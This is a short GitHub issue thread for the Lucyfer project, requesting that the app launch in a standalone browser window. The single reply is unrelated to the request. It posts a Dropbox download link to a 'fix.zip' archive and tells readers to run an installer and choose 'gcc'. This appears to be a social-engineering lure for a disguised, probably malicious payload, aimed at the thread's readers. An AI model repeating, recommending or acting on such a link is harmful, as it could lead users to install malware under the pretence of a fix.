### ISSUE TITLE
Launch Lucyfer in a stand-alone browser window

### ISSUE THREAD

**Issue by pr3d4t0r** [pr3d4t0r/lucyfer#140]
Rather than issuing a naked `open "http://localhost:$LUCYFER_PORT"` from `runLucyferLab()`, launch a web snippet that opens Lucyfer in a standalone browser window.

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
